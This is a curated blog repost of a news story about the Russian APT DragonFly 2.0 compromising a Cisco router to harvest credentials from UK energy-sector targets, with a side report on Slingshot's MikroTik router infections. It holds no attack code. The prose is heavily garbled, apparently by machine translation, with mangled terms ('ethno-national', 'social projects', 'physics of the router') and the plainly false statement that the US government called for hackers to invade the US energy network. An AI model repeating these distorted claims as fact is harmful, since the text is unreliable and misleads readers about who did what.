google-site-verification: google30a059f9a075f398.html

Russian APT Compromised Cisco Router in Energy Sector Attacks

CyberWisdom Safe Harbor Commentary on Cisco Router

A recent story from warns a hidden  ethno-national hacking team that has found compromises in network routers to achieve its ultimate goal: this time, the notorious Russian APT is called DragonFly 2.0.

Last year, the DragonFly hacking team for the United States’ critical infrastructure disrupted the network routers as part of an attack on British energy companies.
There is another ethno-national hacking team that has found compromises in network routers to achieve its ultimate goal: this time, the notorious Russian APT is called DragonFly 2.0, and last week the US federal government called for hackers to invade the US energy network.

This week, researchers from Cylance revealed that they recently discovered that the group invaded the core Cisco router on the network of Vietnam’s largest manufacturer of oil rigs (a state-owned entity) to steal user credentials and eventually penetrated into British energy companies. Cylance said that the misused Cisco router was a “end of life” network device that ultimately provided the attacker with an attack target for energy companies. DragonFly used the stolen certificate as a phishing temptation to attack the British energy sector entity target.

But according to Cylance’s report, there are several missing parts of this attack problem: how the routers are hacked, and how attackers reach the British targets.

Kevin Livelli, director of threat intelligence at Cylance, said it is unclear whether the oil rig manufacturer is a UK target supplier. This connection may explain how it chooses these goals, but Cylance did not find this direct link in its research.

“This is a bigger event we are reporting here,” Livelli said. “We have discovered a bait file embedded in malware samples in the ongoing study of this group. We can see that these fraud files are for people in the UK energy sector.”

If the victim opens the manipulating document – resume, he or she inadvertently connects to the infected router, which automatically authenticates the malicious SMB server with the user’s encrypted credentials. “When users provide their credentials, the router collects these credentials,” he said.

“The router was compromised individually and then merged into the attack,” explained Livelli.

US-CERT and the FBI made a rare attribution announcement last week, stating that Russia supports the highly anticipated DragonFly attack and targeting energy, nuclear power, commercial facilities, water, aviation and key manufacturing.

Hacker attacks on routers are rare, but this is the second time this month that a nation-state has used routers as an attack vector. Earlier this month, researchers at Kaspersky Lab reported that a national-level cyber espionage against Africa and the Middle East has infected MikroTik routers in order to collect management credentials from their targets and then horizontally in the victim network. mobile.

Slingshot is said to be an English-speaking and sophisticated hacking team that puts a malicious dynamic link library (DLL) on the router as a downloader of other malware. When a router administrator logs in to the device, his or her endpoint machine is infected by the router. Alexey Shulmin, chief malware analyst at Kaspersky Lab, told Dark Reading that router security is often overlooked because router security is a blind spot for most businesses.

Cylance’s Livelli said that router hacking typically shows a complex threat organization because it keeps them under radar. He said: “The compromise of the core router is a cause for concern because it is difficult to find, conduct forensic investigations, and it is difficult to repair and repair.” He said, “We have not analyzed and dealt with the same tools that we have on other systems. Router firmware.”

CrowdStrike also saw the DragonFly 2.0 logo – it’s called Berserk Bear – following the router. Adam Meyers, CrowdStrike’s vice president of intelligence, said: “In the summer of 2017, CrowdStrike observed Berserk Bear – related to the collection of energy certificates that took place during the same period – trying to access a router facing the Internet. “SMEs harvesting technology related to this activity It is now quite well-known, not a strong attribution anchor. ”

A Cisco spokesperson stated that the events reported by Cylance are related to traditional routers rather than their latest generation products; this issue is not a bug in the router, but an attacker is required to steal the credentials of the router administrator or acquire the physics of the router in some way. access permission. For example, Cisco previously warned that an attacker gains administrative or physical access to a Cisco IOS Classic router and replaces the operating system with a malicious version.

“While we can’t speculate on specifics in this case, our survey found that in many cases, malicious agents access administrator credentials through compromised authentication servers or social projects,” said a Cisco spokesperson.

Cylance said that DragonFly basically uses the Cisco router as its attack tool, which is tied with the attack of the National Cyber Security Center warning in mid-July 2017 and reported by Motherboard.

Read More…


DragonFly hacking team that targeted US critical infrastructure compromised a network router as part of its attack campaign against UK energy firms last year. Engaging post, Read More…

thumbnail courtesy of

If you like to receive more of these curated safe harbor news alerts then subscribe to my mailing list. and come back soon at to read further CyberWisdom Safe Harbor Commentaries. Home » Curated SafeHarboronCyber’s CyberWisdom Post » Russian APT Compromised Cisco Router in Energy Sector Attacks